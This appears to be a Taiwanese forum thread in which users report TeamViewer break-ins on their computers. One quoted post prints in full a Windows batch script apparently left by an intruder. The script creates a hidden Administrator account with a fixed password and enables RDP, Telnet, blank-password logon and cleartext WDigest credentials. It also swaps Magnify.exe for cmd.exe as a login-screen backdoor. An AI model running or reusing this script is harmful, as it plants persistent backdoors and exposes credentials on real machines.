ZZ0911 wrote:
就在剛剛我家裡房間...(恕刪)
夭壽...最近真的災情慘重啊,話說我今天重灌了電腦,把TV的帳密都換了
結果好像還是被他連進來了,還好我當時人就在電腦前,看到螢幕突然閃一下就覺得不妙
關閉TV的時候他就有提醒"是否要關閉對這台電腦的連線" 卡好哩...這樣也被你認出來
決定不鐵齒把TV通通砍了改用GC遠端桌面=_="
tedjackyx wrote:
有安裝TeamViewer...(恕刪)
raywang310 wrote:
今天teamviewer...
:secacc
cd %windir%\system32
net user Administrator rozensysmaiden /ad
net user Administrator rozensysmaiden
net user Administrator /act
net localgroup Administrators Administrator /ad
attrib +s +h C:\Users\Administrator
attrib +s +h C:\Users\pptp
attrib +s +h C:\Users\pptp$
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v Administrator /t reg_dword /d 0 /f
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v pptp$ /t reg_dword /d 0 /f
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Lsa" /v LimitBlankPasswordUse /t reg_dword /d 0 /f
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t reg_dword /d 0 /f
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /t reg_dword /d 0 /f
reg add "HKLM\SYSTEM\CurrentControlSet\Services\TermDD" /v start /t reg_dword /d 1 /f
reg add "HKLM\SYSTEM\CurrentControlSet\Services\TermService" /v start /t reg_dword /d 2 /f
reg add "HKLM\SYSTEM\CurrentControlSet\Services\TlntSvr" /v start /t reg_dword /d 2 /f
reg add "HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest" /v UseLogonCredential /t REG_DWORD /d 1 /f
netsh advfirewall firewall add rule name="Internet Explorers" dir=in action=allow
net start TermService
takeown /F Magnify.exe
icacls Magnify.exe /grant administrators:f
icacls Magnify.exe /grant system:f
ren Magnify.exe Magnify1.exe
copy cmd.exe Magnify.exe
takeown /F termsrv.dll
icacls termsrv.dll /grant administrators:f
icacls termsrv.dll /grant system:f
cd %systemdrive%\Users
dir /b /on > desktop.txt
%systemdrive%
cd %systemdrive%\Users
@for /f %%i in (desktop.txt) do cd \users\%%i\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibility\&del *.lnk
cd %systemdrive%\Users
del desktop.txt
WMIC USERACCOUNT WHERE "Name='Administrator'" SET PasswordExpires=FALSE
:start pkgmgr /iu:"TelnetServer"
:start pkgmgr /iu:"TelnetClient"
(恕刪)